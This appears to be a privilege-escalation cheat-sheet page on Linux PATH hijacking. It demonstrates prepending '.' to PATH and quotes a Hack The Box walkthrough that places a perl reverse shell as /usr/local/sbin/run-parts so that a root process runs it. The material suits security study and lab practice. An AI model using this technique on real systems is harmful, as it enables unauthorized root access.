Path Abuse

env | grep PATH or echo $PATH.

echo $PATH

/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games

If we can modify a user's path, we could replace a common binary such as ls with a malicious script such as a reverse shell. If we add . to the path by issuing the command PATH=.:$PATH and then export PATH, we will be able to run binaries located in our current working directory by just typing the name of the file

~$ PATH=.:${PATH}
~$ export PATH
~$ echo $PATH

.:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
~$ touch ls
~$ echo 'echo "PATH ABUSE!!"' > ls
~$ chmod +x ls
~$ ls

PATH ABUSE!!

Example 1

2019/10/08 10:56:02 CMD: UID=0    PID=2689   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new

# PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

jkr@writeup:~$ which run-parts
/bin/run-parts

#
jkr@writeup:~$ cp perl-reverse-shell.pl run-parts
jkr@writeup:~$ ls
perl-reverse-shell.pl  run-parts  user.txt
jkr@writeup:~$ mv run-parts /usr/local/sbin

Ref: HTB - Write-Up

Example 2

Example 3

Resources

LogoLinux Privilege Escalation Using PATH VariableHacking Articles
LogoLinux Privilege Escalation using PATH Variable manipulationMedium
PreviousCredentials HuntingNextWildcard Abuse

Last updated